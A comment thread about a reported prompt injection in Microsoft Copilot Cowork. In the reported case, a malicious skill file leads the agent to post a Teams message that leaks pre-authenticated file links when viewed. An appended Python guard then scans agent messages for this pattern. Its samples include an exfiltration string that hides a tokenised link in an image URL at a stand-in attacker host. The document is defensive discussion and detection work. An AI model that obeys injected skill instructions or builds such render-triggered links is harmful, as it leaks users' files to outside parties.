▲ mlacks 4 hours ago

Exfiltrates: to steal sensitive data from a computer system (for example, via a flash drive). I'm not going to defend Microsoft here, but the title (at the source blog) is misleading and a bit rage-baity. What happened with Cowork may have been rushed, possibly due to incompetence, but incompetence is not malice. This framing is also recycled across a few of the author's other interesting findings. Within the article, the wording is much more accurate: “The victim uploads a skill file to Copilot Cowork that contains a prompt injection,” and “The injection manipulates Microsoft Copilot Cowork into posting a Teams message that exfiltrates pre-authenticated file download links when viewed.”
▲ znort_ an hour ago | parent | next [-]

> Within the article, the wording is much more accurate: “The victim uploads a skill file to Copilot Cowork that contains a prompt injection,” and “The injection manipulates Microsoft Copilot Cowork into posting a Teams message that exfiltrates pre-authenticated file download links when viewed.”

It's indeed accurate and clearly states what the outcome is: an exfiltration. Why is it misleading to say so in the title? It's pretty obvious that it means that "cowork" is the component vulnerable to exfiltration, not the prime actor.
▲ codebje 4 hours ago | parent | prev [-]

The malice is by the author of the malicious skill file. This is an intrinsic risk associated with giving LLMs access to sensitive material. It's reckless of Microsoft to give an LLM such broad access based on the user's own permissions. If there were a confirmation prompt for the Teams message, why would even a highly competent user refuse it? That's what the skill says it will do. The message is expected, the visible content is expected, a confirmation prompt is just a nuisance.
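The thread's point is that a user confirmation prompt would not have stopped this: the drafted message looks exactly like what the skill promised. The control that can help is a mechanical one that inspects the agent's outbound message for the pattern the quoted article describes, a pre-authenticated file link smuggled inside an externally hosted URL that fires when the message is rendered. The following is an added illustration, not code from the page, from Microsoft, or from the article's author; the trusted hosts, the credential-style query keys, and the three sample messages are all constructed for the example.

```python
"""
Output-side guard for an LLM agent that may post chat messages on the
user's behalf. Added example; hosts, query keys and samples are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Query keys that typically carry a bearer-style credential in a
# pre-authenticated download link. Assumed list; tune it per tenant.
CREDENTIAL_KEYS = {"sig", "signature", "token", "access_token", "tempauth", "sas"}

# Hosts this tenant owns. Anything else is treated as external. Assumed values.
TRUSTED_HOSTS = {"files.contoso.example", "chat.contoso.example"}

# Matches http(s) URLs in plain text and inside markdown image/link syntax.
URL_RE = re.compile(r"https?://[^\s<>\"'()\[\]]+")


def find_urls(text: str) -> list[str]:
    """Every http(s) URL in the message body."""
    return URL_RE.findall(text)


def is_preauth(url: str) -> bool:
    """True if the URL's query string carries a credential-like parameter."""
    query = parse_qs(urlparse(url).query, keep_blank_values=True)
    return any(key.lower() in CREDENTIAL_KEYS for key in query)


def is_external(url: str) -> bool:
    """True if the URL's host is not one the tenant controls."""
    host = (urlparse(url).hostname or "").lower()
    return host not in TRUSTED_HOSTS


def embedded_urls(url: str) -> list[str]:
    """URLs smuggled inside this URL's query string or path, after percent-decoding.
    This is the shape of a link that leaks its payload when a client fetches it."""
    parsed = urlparse(url)
    decoded = unquote(parsed.query) + " " + unquote(parsed.path)
    return URL_RE.findall(decoded)


def review_message(text: str) -> dict:
    """Classify an agent-drafted message before it is posted.

    Returns {"verdict": "allow" | "warn" | "block", "findings": [...]}.
    The verdict is computed, not asked of the user, because the user would
    approve a message that matches what the skill said it would send.
    """
    findings = []
    for url in find_urls(text):
        inner = embedded_urls(url)
        if is_external(url) and any(not is_external(u) or is_preauth(u) for u in inner):
            findings.append(("block", url, "external URL carries an internal or pre-authenticated link"))
        elif is_preauth(url):
            findings.append(("warn", url, "pre-authenticated link posted into chat"))
        elif is_external(url):
            findings.append(("note", url, "external URL; may be fetched when the message renders"))
    levels = {f[0] for f in findings}
    verdict = "block" if "block" in levels else "warn" if "warn" in levels else "allow"
    return {"verdict": verdict, "findings": findings}


# Constructed sample messages an agent might draft.
SAMPLE_MESSAGES = {
    "benign": "Summary done. The report is at https://files.contoso.example/docs/q3.docx",
    "preauth_internal": "Direct link for you: https://files.contoso.example/d/42?tempauth=AAA",
    "exfil": "Status update attached: ![status](https://tracker.evil.example/p.gif"
             "?u=https%3A%2F%2Ffiles.contoso.example%2Fd%2F42%3Ftempauth%3DAAA)",
}


def verdict_for(name: str) -> str:
    """Convenience wrapper: verdict for one of the constructed samples."""
    return review_message(SAMPLE_MESSAGES[name])["verdict"]


if __name__ == "__main__":
    for name in SAMPLE_MESSAGES:
        print(name, review_message(SAMPLE_MESSAGES[name]))
```

The guard reads only the message text the agent is about to send, so it works regardless of how the injection reached the model. The "warn" tier exists because a pre-authenticated link sent to a colleague inside the tenant may be legitimate; the "block" tier targets the specific combination the article describes, an internal or tokenised link wrapped inside an external URL that a chat client will fetch on view.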